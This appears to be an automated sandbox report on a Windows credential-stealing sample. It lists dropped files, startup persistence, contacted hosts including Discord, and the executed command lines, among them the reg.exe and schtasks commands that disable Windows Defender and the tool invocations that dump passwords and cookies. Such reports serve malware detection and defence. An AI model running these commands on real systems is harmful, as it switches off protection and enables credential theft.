Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\microsoft update manager5160489.exe
- Windows Defender
- %APPDATA%\mozilla\firefox\profiles.ini
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\opera software\opera stable\login data
- %TEMP%\config
- %TEMP%\costura.system.interactive.async.dll.compressed
- %TEMP%\costura.system.linq.async.dll.compressed
- %TEMP%\costura.system.memory.dll.compressed
- %TEMP%\costura.system.numerics.vectors.dll.compressed
- %TEMP%\costura.system.runtime.compilerservices.unsafe.dll.compressed
- %TEMP%\costura.system.threading.tasks.extensions.dll.compressed
- %TEMP%\costura.metadata
- %TEMP%\ss.png
- %TEMP%\costura.costura.dll.compressed
- %TEMP%\compile.bat
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\user_passwords.txt
- %TEMP%\cookies1
- %TEMP%\cookies3
- %TEMP%\cookies2
- %TEMP%\costura.system.collections.immutable.dll.compressed
- %TEMP%\costura.system.drawing.common.dll.compressed
- %TEMP%\costura.system.buffers.dll.compressed
- %TEMP%\costura.newtonsoft.json.dll.compressed
- %TEMP%\costura.netstandard.dll.compressed
- %TEMP%\rtkbtmanserv.exe
- %TEMP%\bfsvc.cfg
- %TEMP%\xwizard.cfg
- %TEMP%\bfsvc.exe
- %TEMP%\winhlp32.exe
- %TEMP%\hh.exe
- %TEMP%\splwow64.exe
- %TEMP%\xwizard.exe
- %TEMP%\user_cookies.txt
- %TEMP%\compile.vbs
- %TEMP%\snuvcdsm.exe
- %TEMP%\costura.discord webhook.dll.compressed
- %TEMP%\costura.discord.net.core.dll.compressed
- %TEMP%\costura.discord.net.rest.dll.compressed
- %TEMP%\costura.discord.net.webhook.dll.compressed
- %TEMP%\costura.dotnetzip.dll.compressed
- %TEMP%\costura.dotnetzip.pdb.compressed
- %TEMP%\costura.leaf.xnet.dll.compressed
- %TEMP%\costura.microsoft.bcl.asyncinterfaces.dll.compressed
- %TEMP%\whysosad
- %TEMP%\costura.costura.pdb.compressed
- %TEMP%\user_history.txt
- %TEMP%\ss.png
- %TEMP%\costura.dotnetzip.dll.compressed
- %TEMP%\costura.dotnetzip.pdb.compressed
- %TEMP%\costura.leaf.xnet.dll.compressed
- %TEMP%\costura.metadata
- %TEMP%\costura.microsoft.bcl.asyncinterfaces.dll.compressed
- %TEMP%\costura.netstandard.dll.compressed
- %TEMP%\costura.discord.net.rest.dll.compressed
- %TEMP%\costura.discord.net.webhook.dll.compressed
- %TEMP%\costura.newtonsoft.json.dll.compressed
- %TEMP%\costura.system.drawing.common.dll.compressed
- %TEMP%\costura.system.interactive.async.dll.compressed
- %TEMP%\costura.system.linq.async.dll.compressed
- %TEMP%\costura.system.memory.dll.compressed
- %TEMP%\costura.system.numerics.vectors.dll.compressed
- %TEMP%\costura.system.runtime.compilerservices.unsafe.dll.compressed
- %TEMP%\costura.system.buffers.dll.compressed
- %TEMP%\costura.system.collections.immutable.dll.compressed
- %TEMP%\costura.discord.net.core.dll.compressed
- %TEMP%\costura.discord webhook.dll.compressed
- %TEMP%\costura.costura.pdb.compressed
- %TEMP%\compile.vbs
- %TEMP%\cookies1
- %TEMP%\cookies2
- %TEMP%\cookies3
- %TEMP%\user_cookies.txt
- %TEMP%\user_history.txt
- %TEMP%\config
- %TEMP%\compile.bat
- %TEMP%\xwizard.exe
- %TEMP%\winhlp32.exe
- %TEMP%\snuvcdsm.exe
- %TEMP%\hh.exe
- %TEMP%\bfsvc.cfg
- %TEMP%\bfsvc.exe
- %TEMP%\xwizard.cfg
- %TEMP%\costura.costura.dll.compressed
- %TEMP%\splwow64.exe
- %TEMP%\costura.system.threading.tasks.extensions.dll.compressed
- %TEMP%\rtkbtmanserv.exe
- from %TEMP%\whysosad to %TEMP%\dav.bat
- %TEMP%\compile.bat
- %TEMP%\compile.vbs
- 'ap###.ipify.org':443
- 'microsoft.com':80
- 'di##ord.com':443
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'ap###.ipify.org':443
- 'di##ord.com':443
- DNS ASK it####lvehacker.gq
- DNS ASK ap###.ipify.org
- DNS ASK microsoft.com
- DNS ASK di##ord.com
- '%TEMP%\rtkbtmanserv.exe' ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs6UEGauYY2qrjFBD0Od2DTrS4e9JqPikv0pIW/XUIMLx/Lbt4rv48+8X6W+0Bd1rjoGR6JWcIBI2J/j2boutUDGytSMd/EXyzMbyRX6dJxPOI3avaUNnt4qtblKJaAoJLY=
- '<SYSTEM32>\wscript.exe' "%TEMP%\compile.vbs"
- '%TEMP%\bfsvc.exe' /capture /Filename "%TEMP%\capture.png"
- '%TEMP%\snuvcdsm.exe' /stext "%TEMP%\user_Passwords.txt"
- '%TEMP%\winhlp32.exe' /stext "%TEMP%\Cookies1"
- '%TEMP%\splwow64.exe' /stext "%TEMP%\Cookies2"
- '%TEMP%\hh.exe' /stext "%TEMP%\Cookies3"
- '%TEMP%\xwizard.exe' /stext "%TEMP%\user_History.txt"
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\dav.bat"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c compile.bat' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del "%TEMP%\RtkBtManServ.exe"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\dav.bat"
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del "%TEMP%\RtkBtManServ.exe"
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\cmd.exe' /c compile.bat
- '<SYSTEM32>\wscript.exe' "%TEMP%\compile.vbs"
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '<SYSTEM32>\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 3